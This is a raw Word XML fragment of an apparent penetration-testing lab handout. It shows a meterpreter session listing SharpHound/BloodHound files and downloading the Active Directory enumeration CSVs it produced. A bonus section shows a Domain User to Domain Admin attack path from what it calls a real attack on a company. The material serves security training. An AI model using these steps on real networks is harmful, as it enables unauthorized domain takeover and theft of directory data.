        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>----              ----    ----  -------------              ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB66AB" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100666/rw-rw-rw-  5011    fil   2018-07-31 03:02:41 -0500  BloodHound.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E7528" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100666/rw-rw-rw-  246489  fil   2018-07-31 02:56:52 -0500  BloodHound_Old.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C513A80" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>40777/rwxrwxrwx   0       dir   2018-07-31 02:56:51 -0500  DebugBuilds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E1878" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100777/rwxrwxrwx  578560  fil   2018-07-31 02:56:51 -0500  SharpHound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D7083" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100666/rw-rw-rw-  642777  fil   2018-07-31 02:56:51 -0500  SharpHound.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60121EEA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100666/rw-rw-rw-  2051    fil   2018-07-31 03:02:41 -0500  group_membership.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238E23B" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>100666/rw-rw-rw-  203     fil   2018-07-31 03:02:41 -0500  local_admins.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BC880" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3557B2E3" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then, collect all the generated .csv files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007686E2" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; download *.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E214C77" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] downloading: .\group_membership.csv -&gt; ./group_membership.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F4C32" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] download   : .\group_membership.csv -&gt; ./group_membership.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AECBC" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] downloading: .\local_admins.csv -&gt; ./local_admins.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3678C895" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] download   : .\local_admins.csv -&gt; ./local_admins.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3BF44" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD63F3" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D1267B8" wp14:editId="5621D103">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>452902</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3070860" cy="3045460"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="2159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Neo4j.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3070860" cy="304546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t>Once the data have been collected, they can be imported in BloodHound application and visualized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B04FBA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EF3C02" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        BONUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDDD5D" w14:textId="33E8811D" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The Hacklab active directory is not an accurate view of a real company AD. To demonstr</w:t>
      </w:r>
      <w:r w:rsidR="00815AA1">
        <w:t>ate how powerful pathfinding is.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815AA1">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>esults from a real attack are presented here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34820673" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Information are gathered the exact same way than they were on the lab. Here is a small part of the AD relationship in BloodHound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E3ACF" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D631545" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D33AFE2" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EF7DAB" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B4D9AA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A5C51C1" wp14:editId="72B94801">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>424131</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3329305" cy="2014220"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="2413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000_entities_telindu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29305" cy="201422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4D0F5913" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Using the gathered data, an attacker can now look for a path to Domain Admin, which is issued by simply running a query. A path is then displayed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D913BA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="490C47F9" wp14:editId="7731EDCD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4096092</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>361999</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="82061" cy="295812"/>
                <wp:effectExtent l="0" t="0" r="32385" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="56" name="Straight Connector 56"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="82061" cy="2958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3C2013" id="Straight Connector 56" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:251735040;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="322.55pt,28.5pt" to="329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" strokecolor="black [3040]"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="517CC337" wp14:editId="3A59E4A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2267145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2486611</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="630262" cy="205154"/>
                <wp:effectExtent l="0" t="0" r="36830" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="55" name="Straight Connector 55"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="630262" cy="2051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56FC7" id="Straight Connector 55"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78.5pt,195.8pt" to="228.15pt,2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" strokecolor="black [3040]"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25A4D18D" wp14:editId="3F07D8A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1232535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2430780</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1034415" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="13335" b="1651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4415" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4761756B" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002131E4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Domain 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4D18D" id="Text Box 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:97.05pt;margin-top:191.4pt;width:81.45pt;height:18.2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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4761756B" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002131E4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Domain Admin</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B0E5A21" wp14:editId="60A45BF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3708400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1905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404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="00E268A9" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002131E4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Domain User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0E5A21" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:292pt;margin-top:9.05pt;width:75pt;height:110.6pt;z-index:251731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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="00E268A9" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002131E4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Domain User</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C68BA25" wp14:editId="78B9E5BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2897065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2547962</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="477764" cy="378460"/>
                <wp:effectExtent l="0" t="0" r="17780" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Rectangle 53"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="477764" cy="378460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="C0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C110F" id="Rectangle 53" o:spid="_x0000_s1026" style="position:absolute;margin-left:228.1pt;margin-top:200.65pt;width:37.6pt;height:29.8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" filled="f" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EAFB518" wp14:editId="05C311FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3753143</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>657811</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="477764" cy="378460"/>
                <wp:effectExtent l="0" t="0" r="17780" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Rectangle 52"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="477764" cy="378460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="C0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9A5724" id="Rectangle 52" o:spid="_x0000_s1026" style="position:absolute;margin-left:295.5pt;margin-top:51.8pt;width:37.6pt;height:29.8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" filled="f" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27960090" wp14:editId="40A04C22">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2675255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2803525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883920" cy="111760"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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ath_To_Domain_Admin_Telindus_Clear.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId35" cstate="print">
                      <a:extLst>
                        <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                          <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                            <a14:imgLayer r:embed="rId36">
                              <a14:imgEffect>
                                <a14:artisticBlur/>
                              </a14:imgEffect>
                            </a14:imgLayer>
                          </a14:imgProps>
                        </a:ext>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="63922" t="23248" r="15462" b="72848"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="883920" cy="111760"/>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727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60959A8D" wp14:editId="66570A22">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2337435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1828165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883920" cy="111760"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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ath_To_Domain_Admin_Telindus_Clear.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId35" cstate="print">
                      <a:extLst>
                        <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                          <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                            <a14:imgLayer r:embed="rId36">
                              <a14:imgEffect>
                                <a14:artisticBlur/>
                              </a14:imgEffect>
                            </a14:imgLayer>
                          </a14:imgProps>
                        </a:ext>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="63922" t="23248" r="15462" b="72848"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="10800000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="883920" cy="111760"/>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726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="342C9E4F" wp14:editId="2EC1FC04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2799715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>925830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883920" cy="111760"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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ath_To_Domain_Admin_Telindus_Clear.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId35" cstate="print">
                      <a:extLst>
                        <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                          <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                            <a14:imgLayer r:embed="rId36">
                              <a14:imgEffect>
                                <a14:artisticBlur/>
                              </a14:imgEffect>
                            </a14:imgLayer>
                          </a14:imgProps>
                        </a:ext>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="63922" t="23248" r="15462" b="72848"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="883920" cy="111760"/>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725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62EDEB96" wp14:editId="5C73B3EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>29943</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="2862580"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="1397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ath_To_Domain_Admin_Telindus_Clea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87520" cy="2862580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg1">
                          <a:lumMod val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6C102" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
